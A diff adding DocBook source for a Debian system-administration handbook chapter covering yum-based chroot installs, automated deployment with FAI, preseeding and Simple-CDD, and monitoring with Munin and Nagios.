+        <title>Installing an RPM based system in Debian with yum</title>
+
+	<para>If the virtual machine is meant to run a Debian (or one of its
+	derivatives), the system can be initialized with
+	<command>debootstrap</command>, as described above.  But if
+	the virtual machine is to be installed with an RPM-based system (such as
+	Fedora, CentOS or Scientific Linux), the setup will need to be
+	done using the <command>yum</command> utility (available in the package
+	of the same name).</para>
+	
+        <para>The procedure requires using <command>rpm</command> to extract an
+        initial set of files, including notably <command>yum</command>
+        configuration files, and then calling <command>yum</command> to extract
+        the remaining set of packages. But since we call <command>yum</command>
+        from outside the chroot, we need to make some temporary changes.
+        In the sample below, the target chroot is
+        <filename>/srv/centos</filename>.</para>
+
+        <screen><computeroutput># </computeroutput><userinput>rootdir="/srv/centos"
+</userinput><computeroutput># </computeroutput><userinput>mkdir -p "$rootdir" /etc/rpm
+</userinput><computeroutput># </computeroutput><userinput>echo "%_dbpath /var/lib/rpm" &gt; /etc/rpm/macros.dbpath
+</userinput><computeroutput># </computeroutput><userinput>wget http://mirror.centos.org/centos/7/os/x86_64/Packages/centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</userinput><computeroutput># </computeroutput><userinput>rpm --nodeps --root "$rootdir" -i centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</userinput><computeroutput>rpm: RPM should not be used directly install RPM packages, use Alien instead!
+rpm: However assuming you know what you are doing...
+warning: centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
+# </computeroutput><userinput>sed -i -e "s,gpgkey=file:///etc/,gpgkey=file://${rootdir}/etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</userinput><computeroutput># </computeroutput><userinput>yum --assumeyes --installroot $rootdir groupinstall core
+</userinput><computeroutput>[...]
+# </computeroutput><userinput>sed -i -e "s,gpgkey=file://${rootdir}/etc/,gpgkey=file:///etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</userinput></screen>
+      </section>
+    </section>
+  </section>
+  <section id="sect.automated-installation">
+    <title>Automated Installation</title>
+    <indexterm><primary>deployment</primary></indexterm>
+    <indexterm><primary>installation</primary><secondary>automated installation</secondary></indexterm>
+
+    <para>The Falcot Corp administrators, like many administrators of large
+    IT services, need tools to install (or reinstall) quickly, and
+    automatically if possible, their new machines.</para>
+
+    <para>These requirements can be met by a wide range of solutions. On
+    the one hand, generic tools such as SystemImager handle this by
+    creating an image based on a template machine, then deploy that image
+    to the target systems; at the other end of the spectrum, the standard
+    Debian installer can be preseeded with a configuration file giving the
+    answers to the questions asked during the installation process. As a
+    sort of middle ground, a hybrid tool such as FAI (<emphasis>Fully
+    Automatic Installer</emphasis>) installs machines using the packaging
+    system, but it also uses its own infrastructure for tasks that are more
+    specific to massive deployments (such as starting, partitioning,
+    configuration and so on).</para>
+
+    <para>Each of these solutions has its pros and cons: SystemImager works
+    independently from any particular packaging system, which allows it to
+    manage large sets of machines using several distinct Linux
+    distributions. It also includes an update system that doesn't require a
+    reinstallation, but this update system can only be reliable if the
+    machines are not modified independently; in other words, the user must
+    not update any software on their own, or install any other software.
+    Similarly, security updates must not be automated, because they have to
+    go through the centralized reference image maintained by SystemImager.
+    This solution also requires the target machines to be homogeneous,
+    otherwise many different images would have to be kept and managed (an
+    i386 image won't fit on a powerpc machine, and so on).</para>
+
+    <para>On the other hand, an automated installation using
+    debian-installer can adapt to the specifics of each machine: the
+    installer will fetch the appropriate kernel and software packages from
+    the relevant repositories, detect available hardware, partition the
+    whole hard disk to take advantage of all the available space, install
+    the corresponding Debian system, and set up an appropriate bootloader.
+    However, the standard installer will only install standard Debian
+    versions, with the base system and a set of pre-selected “tasks”;
+    this precludes installing a particular system with non-packaged
+    applications. Fulfilling this particular need requires customizing the
+    installer… Fortunately, the installer is very modular, and there are
+    tools to automate most of the work required for this customization,
+    most importantly simple-CDD (CDD being an acronym for <emphasis>Custom
+    Debian Derivative</emphasis>). Even the simple-CDD solution, however,
+    only handles initial installations; this is usually not a problem since
+    the APT tools allow efficient deployment of updates later on.</para>
+
+    <para>We will only give a rough overview of FAI, and skip SystemImager
+    altogether (which is no longer in Debian), in order to focus more
+    intently on debian-installer and simple-CDD, which are more interesting
+    in a Debian-only context.</para>
+    <section id="sect.fai">
+      <title>Fully Automatic Installer (FAI)</title>
+      <indexterm><primary>Fully Automatic Installer (FAI)</primary></indexterm>
+
+      <para><foreignphrase>Fully Automatic Installer</foreignphrase> is
+      probably the oldest automated deployment system for Debian, which
+      explains its status as a reference; but its very flexible nature only
+      just compensates for the complexity it involves.</para>
+
+      <para>FAI requires a server system to store deployment information
+      and allow target machines to boot from the network. This server
+      requires the <emphasis role="pkg">fai-server</emphasis> package (or
+      <emphasis role="pkg">fai-quickstart</emphasis>, which also brings the
+      required elements for a standard configuration).</para>
+
+      <para>FAI uses a specific approach for defining the various
+      installable profiles. Instead of simply duplicating a reference
+      installation, FAI is a full-fledged installer, fully configurable via
+      a set of files and scripts stored on the server; the default location
+      <filename>/srv/fai/config/</filename> is not automatically created,
+      so the administrator needs to create it along with the relevant
+      files. Most of the times, these files will be customized from the
+      example files available in the documentation for the <emphasis role="pkg">fai-doc</emphasis> package, more particularly the
+      <filename>/usr/share/doc/fai-doc/examples/simple/</filename>
+      directory.</para>
+
+      <para>Once the profiles are defined, the <command>fai-setup</command>
+      command generates the elements required to start an FAI installation;
+      this mostly means preparing or updating a minimal system (NFS-root)
+      used during installation. An alternative is to generate a dedicated
+      boot CD with <command>fai-cd</command>.</para>
+
+      <para>Creating all these configuration files requires some
+      understanding of the way FAI works. A typical installation process is
+      made of the following steps:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>fetching a kernel from the network, and booting it;</para>
+        </listitem>
+        <listitem>
+	  <para>mounting the root filesystem from NFS;</para>
+        </listitem>
+        <listitem>
+	  <para>executing <command>/usr/sbin/fai</command>, which controls
+	  the rest of the process (the next steps are therefore initiated
+	  by this script);</para>
+        </listitem>
+        <listitem>
+	  <para>copying the configuration space from the server into
+	  <filename>/fai/</filename>;</para>
+        </listitem>
+        <listitem>
+	  <para>running <command>fai-class</command>. The
+	  <filename>/fai/class/[0-9][0-9]*</filename> scripts are executed
+	  in turn, and return names of “classes” that apply to the
+	  machine being installed; this information will serve as a base
+	  for the following steps. This allows for some flexibility in
+	  defining the services to be installed and configured.</para>
+        </listitem>
+        <listitem>
+	  <para>fetching a number of configuration variables, depending on
+	  the relevant classes;</para>
+        </listitem>
+        <listitem>
+	  <para>partitioning the disks and formatting the partitions, based
+	  on information provided in
+	  <filename>/fai/disk_config/<replaceable>class</replaceable></filename>;</para>
+        </listitem>
+        <listitem>
+	  <para>mounting said partitions;</para>
+        </listitem>
+        <listitem>
+	  <para>installing the base system;</para>
+        </listitem>
+        <listitem>
+	  <para>preseeding the Debconf database with
+	  <command>fai-debconf</command>;</para>
+        </listitem>
+        <listitem>
+	  <para>fetching the list of available packages for APT;</para>
+        </listitem>
+        <listitem>
+	  <para>installing the packages listed in
+	  <filename>/fai/package_config/<replaceable>class</replaceable></filename>;</para>
+        </listitem>
+        <listitem>
+	  <para>executing the post-configuration scripts,
+	  <filename>/fai/scripts/<replaceable>class</replaceable>/[0-9][0-9]*</filename>;</para>
+        </listitem>
+        <listitem>
+	  <para>recording the installation logs, unmounting the partitions,
+	  and rebooting.</para>
+        </listitem>
+      </itemizedlist>
+    </section>
+    <section id="sect.d-i-preseeding">
+      <title>Preseeding Debian-Installer</title>
+      <indexterm><primary>preseed</primary></indexterm>
+      <indexterm><primary>preconfiguration</primary></indexterm>
+
+      <para>At the end of the day, the best tool to install Debian systems
+      should logically be the official Debian installer. This is why, right
+      from its inception, debian-installer has been designed for automated
+      use, taking advantage of the infrastructure provided by <emphasis role="pkg">debconf</emphasis>. The latter allows, on the one hand, to
+      reduce the number of questions asked (hidden questions will use the
+      provided default answer), and on the other hand, to provide the
+      default answers separately, so that installation can be
+      non-interactive. This last feature is known as
+      <emphasis>preseeding</emphasis>.</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Debconf with a centralized database</title>
+        <indexterm><primary><command>debconf</command></primary></indexterm>
+
+	<para>Preseeding allows to provide a set of answers to Debconf
+	questions at installation time, but these answers are static and do
+	not evolve as time passes. Since already-installed machines may
+	need upgrading, and new answers may become required, the
+	<filename>/etc/debconf.conf</filename> configuration file can be
+	set up so that Debconf uses external data sources (such as an LDAP
+	directory server, or a remote file accessed via NFS or Samba).
+	Several external data sources can be defined at the same time, and
+	they complement one another. The local database is still used (for
+	read-write access), but the remote databases are usually restricted
+	to reading. The
+	<citerefentry><refentrytitle>debconf.conf</refentrytitle>
+	<manvolnum>5</manvolnum></citerefentry> manual page describes all
+        the possibilities in detail (you need the <emphasis role="pkg">debconf-doc</emphasis> package).</para>
+      </sidebar>
+      <section>
+        <title>Using a Preseed File</title>
+
+	<para>There are several places where the installer can get a
+	preseeding file:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>in the initrd used to start the machine; in this case,
+	    preseeding happens at the very beginning of the installation,
+	    and all questions can be avoided. The file just needs to be
+	    called <filename>preseed.cfg</filename> and stored in the
+	    initrd root.</para>
+          </listitem>
+          <listitem>
+	    <para>on the boot media (CD or USB key); preseeding then
+	    happens as soon as the media is mounted, which means right
+	    after the questions about language and keyboard layout. The
+	    <literal>preseed/file</literal> boot parameter can be used to
+	    indicate the location of the preseeding file (for instance,
+	    <filename>/cdrom/preseed.cfg</filename> when the installation
+	    is done off a CD-ROM, or
+	    <filename>/hd-media/preseed.cfg</filename> in the USB-key
+	    case).</para>
+          </listitem>
+          <listitem>
+	    <para>from the network; preseeding then only happens after the
+	    network is (automatically) configured; the relevant boot
+	    parameter is then
+	    <literal>preseed/url=http://<replaceable>server</replaceable>/preseed.cfg</literal>.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>At a glance, including the preseeding file in the initrd
+	looks like the most interesting solution; however, it is rarely
+	used in practice, because generating an installer initrd is rather
+	complex. The other two solutions are much more common, especially
+	since boot parameters provide another way to preseed the answers to
+	the first questions of the installation process. The usual way to
+	save the bother of typing these boot parameters by hand at each
+	installation is to save them into the configuration for
+	<command>isolinux</command> (in the CD-ROM case) or
+	<command>syslinux</command> (USB key).</para>
+      </section>
+      <section>
+        <title>Creating a Preseed File</title>
+
+	<para>A preseed file is a plain text file, where each line contains
+	the answer to one Debconf question. A line is split across four
+	fields separated by whitespace (spaces or tabs), as in, for
+	instance, <literal>d-i mirror/suite string stable</literal>:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>the first field is the “owner” of the question;
+	    “d-i” is used for questions relevant to the installer, but
+	    it can also be a package name for questions coming from Debian
+	    packages;</para>
+          </listitem>
+          <listitem>
+	    <para>the second field is an identifier for the question;</para>
+          </listitem>
+          <listitem>
+	    <para>third, the type of question;</para>
+          </listitem>
+          <listitem>
+	    <para>the fourth and last field contains the value for the
+	    answer. Note that it must be separated from the third field
+	    with a single space; if there are more than one, the
+	    following space characters are considered part of the value.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>The simplest way to write a preseed file is to install a
+	system by hand. Then <command>debconf-get-selections
+	--installer</command> will provide the answers concerning the
+	installer. Answers about other packages can be obtained with
+	<command>debconf-get-selections</command>. However, a cleaner
+	solution is to write the preseed file by hand, starting from an
+	example and the reference documentation: with such an approach,
+	only questions where the default answer needs to be overridden can
+	be preseeded; using the <literal>priority=critical</literal> boot
+	parameter will instruct Debconf to only ask critical questions, and
+	use the default answer for others.</para>
+
+        <sidebar>
+          <title><emphasis>DOCUMENTATION</emphasis> Installation guide appendix</title>
+
+	  <para>The installation guide, available online, includes detailed
+	  documentation on the use of a preseed file in an appendix. It
+	  also includes a detailed and commented sample file, which can
+	  serve as a base for local customizations. <ulink type="block" url="https://www.debian.org/releases/jessie/amd64/apb.html" />
+	  <ulink type="block" url="https://www.debian.org/releases/jessie/example-preseed.txt" /></para>
+        </sidebar>
+      </section>
+      <section>
+        <title>Creating a Customized Boot Media</title>
+
+	<para>Knowing where to store the preseed file is all very well, but
+	the location isn't everything: one must, one way or another, alter
+	the installation boot media to change the boot parameters and add
+	the preseed file.</para>
+        <section>
+          <title>Booting From the Network</title>
+
+	  <para>When a computer is booted from the network, the server
+	  sending the initialization elements also defines the boot
+	  parameters. Thus, the change needs to be made in the PXE
+	  configuration for the boot server; more specifically, in its
+	  <filename>/tftpboot/pxelinux.cfg/default</filename> configuration
+	  file. Setting up network boot is a prerequisite; see the
+	  Installation Guide for details. <ulink type="block" url="https://www.debian.org/releases/jessie/amd64/ch04s05.html" /></para>
+        </section>
+        <section>
+          <title>Preparing a Bootable USB Key</title>
+
+	  <para>Once a bootable key has been prepared (see <xref linkend="sect.install-usb" />), a few extra operations are
+	  needed. Assuming the key contents are available under
+	  <filename>/media/usbdisk/</filename>:</para>
+          <itemizedlist>
+            <listitem>
+	      <para>copy the preseed file to
+	      <filename>/media/usbdisk/preseed.cfg</filename></para>
+            </listitem>
+            <listitem>
+	      <para>edit <filename>/media/usbdisk/syslinux.cfg</filename>
+	      and add required boot parameters (see example below).</para>
+            </listitem>
+          </itemizedlist>
+
+          <example>
+            <title>syslinux.cfg file and preseeding parameters</title>
+
+            <programlisting>default vmlinuz
+append preseed/file=/hd-media/preseed.cfg locale=en_US.UTF-8 keymap=us language=us country=US vga=788 initrd=initrd.gz  --
+</programlisting>
+          </example>
+        </section>
+        <section>
+          <title>Creating a CD-ROM Image</title>
+          <indexterm><primary>debian-cd</primary></indexterm>
+
+	  <para>A USB key is a read-write media, so it was easy for us to
+	  add a file there and change a few parameters. In the CD-ROM case,
+	  the operation is more complex, since we need to regenerate a full
+	  ISO image. This task is handled by <emphasis role="pkg">debian-cd</emphasis>, but this tool is rather awkward
+	  to use: it needs a local mirror, and it requires an understanding
+	  of all the options provided by
+	  <filename>/usr/share/debian-cd/CONF.sh</filename>; even then,
+	  <command>make</command> must be invoked several times.
+	  <filename>/usr/share/debian-cd/README</filename> is therefore a
+	  very recommended read.</para>
+
+	  <para>Having said that, debian-cd always operates in a similar
+	  way: an “image” directory with the exact contents of the
+	  CD-ROM is generated, then converted to an ISO file with a tool
+	  such as <command>genisoimage</command>,
+	  <command>mkisofs</command> or <command>xorriso</command>. The
+	  image directory is finalized after debian-cd's <command>make
+	  image-trees</command> step. At that point, we insert the preseed
+	  file into the appropriate directory (usually
+	  <filename>$TDIR/$CODENAME/CD1/</filename>, $TDIR and $CODENAME being
+	  parameters defined by the <filename>CONF.sh</filename>
+	  configuration file). The CD-ROM uses <command>isolinux</command>
+	  as its bootloader, and its configuration file must be adapted
+	  from what debian-cd generated, in order to insert the required
+	  boot parameters (the specific file is
+	  <filename>$TDIR/$CODENAME/boot1/isolinux/isolinux.cfg</filename>).
+	  Then the “normal” process can be resumed, and we can go on to
+	  generating the ISO image with <command>make image CD=1</command>
+	  (or <command>make images</command> if several CD-ROMs are
+	  generated).</para>
+        </section>
+      </section>
+    </section>
+    <section id="sect.simple-cdd">
+      <title>Simple-CDD: The All-In-One Solution</title>
+      <indexterm><primary>simple-cdd</primary></indexterm>
+
+      <para>Simply using a preseed file is not enough to fulfill all the
+      requirements that may appear for large deployments. Even though it is
+      possible to execute a few scripts at the end of the normal
+      installation process, the selection of the set of packages to install
+      is still not quite flexible (basically, only “tasks” can be
+      selected); more important, this only allows installing official
+      Debian packages, and precludes locally-generated ones.</para>
+
+      <para>On the other hand, debian-cd is able to integrate external
+      packages, and debian-installer can be extended by inserting new steps
+      in the installation process. By combining these capabilities, it
+      should be possible to create a customized installer that fulfills our
+      needs; it should even be able to configure some services after
+      unpacking the required packages. Fortunately, this is not a mere
+      hypothesis, since this is exactly what Simple-CDD (in the <emphasis role="pkg">simple-cdd</emphasis> package) does.</para>
+
+      <para>The purpose of Simple-CDD is to allow anyone to easily create a
+      distribution derived from Debian, by selecting a subset of the
+      available packages, preconfiguring them with Debconf, adding specific
+      software, and executing custom scripts at the end of the installation
+      process. This matches the “universal operating system”
+      philosophy, since anyone can adapt it to their own needs.</para>
+      <section>
+        <title>Creating Profiles</title>
+
+	<para>Simple-CDD defines “profiles” that match the FAI
+	“classes” concept, and a machine can have several profiles
+	(determined at installation time). A profile is defined by a set of
+	<filename>profiles/<replaceable>profile</replaceable>.*</filename>
+	files:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>the <filename>.description</filename> file contains a
+	    one-line description for the profile;</para>
+          </listitem>
+          <listitem>
+	    <para>the <filename>.packages</filename> file lists packages
+	    that will automatically be installed if the profile is
+	    selected;</para>
+          </listitem>
+          <listitem>
+	    <para>the <filename>.downloads</filename> file lists packages
+	    that will be stored onto the installation media, but not
+	    necessarily installed;</para>
+          </listitem>
+          <listitem>
+	    <para>the <filename>.preseed</filename> file contains
+	    preseeding information for Debconf questions (for the installer
+	    and/or for packages);</para>
+          </listitem>
+          <listitem>
+	    <para>the <filename>.postinst</filename> file contains a script
+	    that will be run at the end of the installation process;</para>
+          </listitem>
+          <listitem>
+	    <para>lastly, the <filename>.conf</filename> file allows
+	    changing some Simple-CDD parameters based on the profiles to be
+	    included in an image.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>The <literal>default</literal> profile has a particular role,
+	since it is always selected; it contains the bare minimum required
+	for Simple-CDD to work. The only thing that is usually customized
+	in this profile is the <literal>simple-cdd/profiles</literal>
+	preseed parameter: this allows avoiding the question, introduced by
+	Simple-CDD, about what profiles to install.</para>
+
+	<para>Note also that the commands will need to be invoked from the
+	parent directory of the <filename>profiles</filename>
+	directory.</para>
+      </section>
+      <section>
+        <title>Configuring and Using <command>build-simple-cdd</command></title>
+        <indexterm><primary><command>build-simple-cdd</command></primary></indexterm>
+
+        <sidebar>
+          <title><emphasis>QUICK LOOK</emphasis> Detailed configuration file</title>
+
+	  <para>An example of a Simple-CDD configuration file, with all
+	  possible parameters, is included in the package
+	  (<filename>/usr/share/doc/simple-cdd/examples/simple-cdd.conf.detailed.gz</filename>).
+	  This can be used as a starting point when creating a custom
+	  configuration file.</para>
+        </sidebar>
+
+	<para>Simple-CDD requires many parameters to operate fully. They
+	will most often be gathered in a configuration file, which
+	<command>build-simple-cdd</command> can be pointed at with the
+	<literal>--conf</literal> option, but they can also be specified
+	via dedicated parameters given to
+	<command>build-simple-cdd</command>. Here is an overview of how
+	this command behaves, and how its parameters are used:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>the <literal>profiles</literal> parameter lists the
+	    profiles that will be included on the generated CD-ROM
+	    image;</para>
+          </listitem>
+          <listitem>
+	    <para>based on the list of required packages, Simple-CDD
+	    downloads the appropriate files from the server mentioned in
+	    <literal>server</literal>, and gathers them into a partial
+	    mirror (which will later be given to debian-cd);</para>
+          </listitem>
+          <listitem>
+	    <para>the custom packages mentioned in
+	    <literal>local_packages</literal> are also integrated into this
+	    local mirror;</para>
+          </listitem>
+          <listitem>
+	    <para>debian-cd is then executed (within a default location
+	    that can be configured with the
+	    <literal>debian_cd_dir</literal> variable), with the list of
+	    packages to integrate;</para>
+          </listitem>
+          <listitem>
+	    <para>once debian-cd has prepared its directory, Simple-CDD
+	    applies some changes to this directory:</para>
+            <itemizedlist>
+              <listitem>
+		<para>files containing the profiles are added in a
+		<filename>simple-cdd</filename> subdirectory (that will end
+		up on the CD-ROM);</para>
+              </listitem>
+              <listitem>
+		<para>other files listed in the
+		<literal>all_extras</literal> parameter are also
+		added;</para>
+              </listitem>
+              <listitem>
+		<para>the boot parameters are adjusted so as to enable the
+		preseeding. Questions concerning language and country can
+		be avoided if the required information is stored in the
+		<literal>language</literal> and <literal>country</literal>
+		variables.</para>
+              </listitem>
+            </itemizedlist>
+          </listitem>
+          <listitem>
+	    <para>debian-cd then generates the final ISO image.</para>
+          </listitem>
+        </itemizedlist>
+      </section>
+      <section>
+        <title>Generating an ISO Image</title>
+
+	<para>Once we have written a configuration file and defined our
+	profiles, the remaining step is to invoke <command>build-simple-cdd
+	--conf simple-cdd.conf</command>. After a few minutes, we get the
+	required image in
+	<filename>images/debian-8.0-amd64-CD-1.iso</filename>.</para>
+      </section>
+    </section>
+  </section>
+  <section id="sect.monitoring">
+    <title>Monitoring</title>
+
+    <para>Monitoring is a generic term, and the various involved activities
+    have several goals: on the one hand, following usage of the resources
+    provided by a machine allows anticipating saturation and the subsequent
+    required upgrades; on the other hand, alerting the administrator as
+    soon as a service is unavailable or not working properly means
+    that the problems that do happen can be fixed sooner.</para>
+
+    <para><emphasis>Munin</emphasis> covers the first area, by displaying
+    graphical charts for historical values of a number of parameters (used
+    RAM, occupied disk space, processor load, network traffic, Apache/MySQL
+    load, and so on). <emphasis>Nagios</emphasis> covers the second area,
+    by regularly checking that the services are working and available, and
+    sending alerts through the appropriate channels (e-mails, text
+    messages, and so on). Both have a modular design, which makes it easy
+    to create new plug-ins to monitor specific parameters or
+    services.</para>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> Zabbix, an integrated monitoring tool</title>
+      <indexterm><primary>Zabbix</primary></indexterm>
+
+      <para>Although Munin and Nagios are in very common use, they are not
+      the only players in the monitoring field, and each of them only
+      handles half of the task (graphing on one side, alerting on the
+      other). Zabbix, on the other hand, integrates both parts of
+      monitoring; it also has a web interface for configuring the most
+      common aspects. It has grown by leaps and bounds during the last few
+      years, and can now be considered a viable contender. On the monitoring
+      server, you would install <emphasis role="pkg">zabbix-server-pgsql</emphasis>
+      (or <emphasis role="pkg">zabbix-server-mysql</emphasis>), possibly
+      together with <emphasis role="pkg">zabbix-frontend-php</emphasis>
+      to have a web interface. On the hosts to monitor you would install
+      <emphasis role="pkg">zabbix-agent</emphasis> feeding data back to the
+      server.
+      <ulink type="block" url="http://www.zabbix.com/" /></para>
+    </sidebar>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> Icinga, a Nagios fork</title>
+      <indexterm><primary>Icinga</primary></indexterm>
+
+      <para>Spurred by divergences in opinions concerning the development
+      model for Nagios (which is controlled by a company), a number of
+      developers forked Nagios and use Icinga as their new name. Icinga is
+      still compatible — so far — with Nagios configurations and
+      plugins, but it also adds extra features.
+      <ulink type="block" url="http://www.icinga.org/" /></para>
+    </sidebar>
+    <section id="sect.munin">
+      <title>Setting Up Munin</title>
+      <indexterm><primary>Munin</primary></indexterm>
+
+      <para>The purpose of Munin is to monitor many machines; therefore, it
+      quite naturally uses a client/server architecture. The central host
+      — the grapher — collects data from all the monitored hosts, and
+      generates historical graphs.</para>
+      <section>
+        <title>Configuring Hosts To Monitor</title>
+
+	<para>The first step is to install the <emphasis role="pkg">munin-node</emphasis> package. The daemon installed by
+	this package listens on port 4949 and sends back the data collected
+	by all the active plugins. Each plugin is a simple program
+	returning a description of the collected data as well as the latest
+	measured value. Plugins are stored in
+	<filename>/usr/share/munin/plugins/</filename>, but only those with
+	a symbolic link in <filename>/etc/munin/plugins/</filename> are
+	really used.</para>
+
+	<para>When the package is installed, a set of active plugins is
+	determined based on the available software and the current
+	configuration of the host. However, this autoconfiguration depends
+	on a feature that each plugin must provide, and it is usually a
+        good idea to review and tweak the results by hand. Browsing
+        the <ulink url="http://gallery.munin-monitoring.org">Plugin Gallery</ulink>
+        can be interesting even though not all plugins have comprehensive
+        documentation. However, all plugins are scripts and most are rather simple and
+	well-commented. Browsing <filename>/etc/munin/plugins/</filename>
+	is therefore a good way of getting an idea of what each plugin is
+	about and determining which should be removed. Similarly, enabling
+	an interesting plugin found in
+	<filename>/usr/share/munin/plugins/</filename> is a simple matter
+	of setting up a symbolic link with <command>ln -sf
+	/usr/share/munin/plugins/<replaceable>plugin</replaceable>
+	/etc/munin/plugins/</command>. Note that when a plugin name ends
+	with an underscore “_”, the plugin requires a parameter. This
+	parameter must be stored in the name of the symbolic link; for
+	instance, the “if_” plugin must be enabled with a
+	<filename>if_eth0</filename> symbolic link, and it will monitor
+	network traffic on the eth0 interface.</para>
+
+	<para>Once all plugins are correctly set up, the daemon
+	configuration must be updated to describe access control for the
+	collected data. This involves <literal>allow</literal> directives
+	in the <filename>/etc/munin/munin-node.conf</filename> file. The
+	default configuration is <literal>allow ^127\.0\.0\.1$</literal>,
+	and only allows access to the local host. An administrator will
+	usually add a similar line containing the IP address of the grapher
+	host, then restart the daemon with <command>service munin-node
+	restart</command>.</para>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> Creating local plugins</title>
+
+	  <para>Munin does include detailed documentation on how plugins
+	  should behave, and how to develop new plugins. <ulink type="block" url="http://munin-monitoring.org/wiki/plugins" /></para>
+
+	  <para>A plugin is best tested when run in the same conditions as
+	  it would be when triggered by munin-node; this can be simulated
+	  by running <command>munin-run
+	  <replaceable>plugin</replaceable></command> as root. A potential
+	  second parameter given to this command (such as
+	  <literal>config</literal>) is passed to the plugin as a
+	  parameter.</para>
+
+	  <para>When a plugin is invoked with the <literal>config</literal>
+	  parameter, it must describe itself by returning a set of
+	  fields:</para>
+
+          <screen><computeroutput>$ </computeroutput><userinput>sudo munin-run load config
+</userinput><computeroutput>graph_title Load average
+graph_args --base 1000 -l 0
+graph_vlabel load
+graph_scale no
+graph_category system
+load.label load
+graph_info The load average of the machine describes how many processes are in the run-queue (scheduled to run "immediately").
+load.info 5 minute load average
+</computeroutput>
+</screen>
+
+	  <para>The various available fields are described by the
+            “Plugin reference” available as part of the “Munin guide”.
+          <ulink type="block" url="http://munin.readthedocs.org/en/latest/reference/plugin.html" /></para>
+
+	  <para>When invoked without a parameter, the plugin simply returns
+	  the last measured values; for instance, executing <command>sudo
+	  munin-run load</command> could return <literal>load.value
+	  0.12</literal>.</para>
+
+	  <para>Finally, when a plugin is invoked with the
+	  <literal>autoconf</literal> parameter, it should return “yes”
+	  (and a 0 exit status) or “no” (with a 1 exit status)
+	  according to whether the plugin should be enabled on this
+	  host.</para>
+        </sidebar>
+      </section>
+      <section>
+        <title>Configuring the Grapher</title>
+
+	<para>The “grapher” is simply the computer that aggregates the
+	data and generates the corresponding graphs. The required software
+	is in the <emphasis role="pkg">munin</emphasis> package. The
+	standard configuration runs <command>munin-cron</command> (once
+	every 5 minutes), which gathers data from all the hosts listed in
+	<filename>/etc/munin/munin.conf</filename> (only the local host is
+	listed by default), saves the historical data in RRD files
+	(<emphasis>Round Robin Database</emphasis>, a file format designed
+	to store data varying in time) stored under
+	<filename>/var/lib/munin/</filename> and generates an HTML page
+	with the graphs in
+	<filename>/var/cache/munin/www/</filename>.</para>
+
+	<para>All monitored machines must therefore be listed in the
+	<filename>/etc/munin/munin.conf</filename> configuration file. Each
+	machine is listed as a full section with a name matching the
+	machine and at least an <literal>address</literal> entry giving the
+	corresponding IP address.</para>
+
+        <programlisting>[ftp.falcot.com]
+    address 192.168.0.12
+    use_node_name yes
+</programlisting>
+
+	<para>Sections can be more complex, and describe extra graphs that
+	could be created by combining data coming from several machines.
+	The samples provided in the configuration file are good starting
+	points for customization.</para>
+
+	<para>The last step is to publish the generated pages; this
+	involves configuring a web server so that the contents of
+	<filename>/var/cache/munin/www/</filename> are made available on a
+	website. Access to this website will often be restricted, using
+	either an authentication mechanism or IP-based access control. See
+	<xref linkend="sect.http-web-server" /> for the relevant
+	details.</para>
+      </section>
+    </section>
+    <section id="sect.nagios">
+      <title>Setting Up Nagios</title>
+      <indexterm><primary>Nagios</primary></indexterm>
+
+      <para>Unlike Munin, Nagios does not necessarily require installing
+      anything on the monitored hosts; most of the time, Nagios is used to
+      check the availability of network services. For instance, Nagios can
+      connect to a web server and check that a given web page can be
+      obtained within a given time.</para>
+      <section>
+        <title>Installing</title>
+
+	<para>The first step in setting up Nagios is to install the
+	<emphasis role="pkg">nagios3</emphasis>, <emphasis role="pkg">nagios-plugins</emphasis> and <emphasis role="pkg">nagios3-doc</emphasis> packages. Installing the packages
+	configures the web interface and creates a first
+	<literal>nagiosadmin</literal> user (for which it asks for a
+	password). Adding other users is a simple matter of inserting them
+	in the <filename>/etc/nagios3/htpasswd.users</filename> file with
+	Apache's <command>htpasswd</command> command. If no Debconf
+	question was displayed during installation,
+	<command>dpkg-reconfigure nagios3-cgi</command> can be used to
+	define the <literal>nagiosadmin</literal> password.</para>
+
+	<para>Pointing a browser at
+	<literal>http://<replaceable>server</replaceable>/nagios3/</literal>
+	displays the web interface; in particular, note that Nagios already
+	monitors some parameters of the machine where it runs. However,
+	some interactive features such as adding comments to a host do not
+	work. These features are disabled in the default configuration for
+	Nagios, which is very restrictive for security reasons.</para>
+
+	<para>As documented in
+	<filename>/usr/share/doc/nagios3/README.Debian</filename>, enabling
+	some features involves editing
+	<filename>/etc/nagios3/nagios.cfg</filename> and setting its
+	<literal>check_external_commands</literal> parameter to “1”. We
+	also need to set up write permissions for the directory used by
+	Nagios, with commands such as the following:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>service nagios3 stop</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>dpkg-statoverride --update --add nagios www-data 2710 /var/lib/nagios3/rw
+</userinput><computeroutput># </computeroutput><userinput>dpkg-statoverride --update --add nagios nagios 751 /var/lib/nagios3
+</userinput><computeroutput># </computeroutput><userinput>service nagios3 start</userinput>
+<computeroutput>[...]</computeroutput>
+</screen>
+      </section>
+      <section>
+        <title>Configuring</title>
+
+	<para>The Nagios web interface is rather nice, but it does not
+	allow configuration, nor can it be used to add monitored hosts and
+	services. The whole configuration is managed via files referenced
+	in the central configuration file,
+	<filename>/etc/nagios3/nagios.cfg</filename>.</para>
+
+	<para>These files should not be dived into without some
+	understanding of the Nagios concepts. The configuration lists
+	objects of the following types:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>a <emphasis>host</emphasis> is a machine to be
+	    monitored;</para>
+          </listitem>
+          <listitem>
+	    <para>a <emphasis>hostgroup</emphasis> is a set of hosts that
